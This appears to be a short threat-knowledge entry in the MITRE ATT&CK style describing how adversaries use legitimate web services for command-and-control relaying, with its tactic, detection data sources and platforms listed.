Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre